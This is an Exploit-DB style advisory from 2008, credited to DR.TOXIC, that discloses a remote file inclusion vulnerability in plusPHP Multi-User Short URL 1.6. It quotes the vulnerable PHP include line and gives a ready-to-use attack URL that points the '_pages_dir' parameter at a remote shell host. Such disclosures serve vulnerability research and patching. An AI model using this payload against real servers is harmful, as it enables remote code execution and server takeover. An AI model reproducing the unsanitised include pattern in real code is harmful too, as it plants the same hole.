plusphp url shortening software 1.6 - Remote File Inclusion

EDB-ID:

5672

Author:

DR.TOXIC

Type:

webapps

Platform:

PHP

Published:

2008-05-25

Author: DR.TOXIC  / dr.toxic@windowslive.com
 
Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Script Download: http://www.hotscripts.com/jump.php?listing_id=80293&jump_type=1
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?
<--------------------Milw0rm Exploits-------------------->

# milw0rm.com [2008-05-25]